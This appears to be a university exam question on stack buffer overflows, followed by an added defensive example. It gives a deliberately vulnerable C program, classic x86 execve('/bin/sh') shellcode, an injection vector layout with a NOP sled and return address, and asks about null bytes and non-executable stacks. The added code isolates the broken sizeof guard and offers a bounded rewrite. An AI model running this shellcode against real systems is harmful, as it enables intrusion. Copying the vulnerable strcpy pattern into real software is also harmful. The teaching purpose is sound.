
Question


4. Question. Consider the following C code fragment and assume the program name is fixed to vuln, it is invoked as ./vuln (i.e., argv[0]) and cannot be changed by an attacker.

    int
    main(int argc, char **argv)
    {
        if (argv[1])
            return foo(argv[1]);
        else
            return foo(argv[0]);
    }

    int
    foo(char *arg)
    {
        char bar[128];

        if (sizeof(arg) > 128) {
            strcpy(bar, arg);

            // never return to main so even if vulnerable
            // no ret is executed and no shellcode is triggered
            exit(0);
        }

        strcpy(bar, arg);

        return strlen(bar);
    }

b. Assuming that the above code is vulnerable (or can be modified to become vulnerable) and that the vulnerability can be successfully exploited (or can be modified to be exploited), then consider the following x86 assembly code fragment, which may be used to exploit the previous vulnerability:

    int
    main(void)
    {
        __asm__(
            "jmp ahead"
            "back:"
            "popl %ebx"
            "movl %ebx, 0x8(%ebx)"
            "xorl %eax, %eax"
            "movb %al, 0x7(%ebx)"
            "movl %eax, 0xc(%ebx)"
            "movl %eax, %edx"
            "movl $0xb, %eax"
            "movl 0xc(%ebx), %ecx"
            "int $0x80"
            "ahead:"
            "call back"
            ".string \"/bin/sh\""
        );
    }

i. Assuming the above assembly snippet (shown in Question 4 (b)) is placed on the stack, what does the assembly code do? Add comments to each line and explain its semantics in the context of the shellcode. For instance, the instruction mov $0xb, %eax copies the constant value 0xb into the register %eax. This represents the index that refers to the system call execve. [12 marks]

ii. An attacker creates a suitable injection vector to exploit the aforementioned memory error. To this end, he places the shellcode in the injection vector, pads it with his initials so as to create a message long enough to overflow bar; then the attacker adds the appropriate address at the right place and terminates the message with a NULL ('\0'). In other words, the injection vector looks as follows:

    | nop sled | shellcode | 0xbfff1234 | \0 |

Next, he runs the program giving this injection vector to it as its first argument. To his surprise, the attack fails. He asks you for help. State why the attack cannot work. [2 marks]

iii. Show how the shellcode can be modified to make the attack possible. (Note: don't worry if you do not know the exact syntax of instructions; marks will be awarded for a clear explanation.) [2 marks]

c. Assume the code shown at the beginning of the question is vulnerable (or can be modified to be so) and the vulnerability can be successfully exploited. State and describe what technique(s) an attacker would use to exploit the vulnerability shown at the beginning of the question, if the kernel enforces a non-executable stack protection (again, assume the small program shown at the beginning of the question is exploitable or can be modified to be exploited successfully). [4 marks]
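As an added example (not part of the exam question or any model answer), the guard from foo() isolated to show why it never fires, beside a bounded rewrite of foo() that fails closed instead of overflowing bar[]; BAR_SIZE, guard_as_written, foo_bounded and the 200-byte sample argument are constructed here and assume the same 128-byte buffer as the question.

```c
#include <stdio.h>
#include <string.h>

#define BAR_SIZE 128   /* same buffer size as the question's foo() */

/* The question's guard, isolated. sizeof(arg) is the size of a char*
 * (4 bytes on 32-bit x86, 8 on x86-64), never the length of the string
 * arg points to, so the comparison is always false: the exit(0) branch
 * is dead code and every argument reaches the unbounded strcpy(). */
int guard_as_written(const char *arg)
{
    return sizeof(arg) > BAR_SIZE;   /* always 0 */
}

/* Bounded replacement for foo(): measure the argument without reading
 * past BAR_SIZE bytes, reject anything that does not fit together with
 * its terminating NUL, and only then copy. Returns -1 on rejection so
 * the caller can fail closed instead of overflowing bar[]. */
int foo_bounded(const char *arg)
{
    char bar[BAR_SIZE];
    size_t len = 0;

    while (len < BAR_SIZE && arg[len] != '\0')   /* bounded scan */
        len++;
    if (len >= BAR_SIZE)                          /* no room for the NUL */
        return -1;
    memcpy(bar, arg, len + 1);                    /* copies exactly len+1 bytes */
    return (int)len;
}

/* Constructed oversized argument (not from the page): 200 'A' bytes,
 * more than enough to overrun the 128-byte bar[] in the original foo(). */
const char *oversized_arg(void)
{
    static char buf[201];
    memset(buf, 'A', sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';
    return buf;
}

int main(void)
{
    printf("guard fires for 200-byte arg? %d\n", guard_as_written(oversized_arg()));
    printf("foo_bounded(\"./vuln\") = %d\n", foo_bounded("./vuln"));
    printf("foo_bounded(200-byte arg) = %d\n", foo_bounded(oversized_arg()));
    return 0;
}
```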
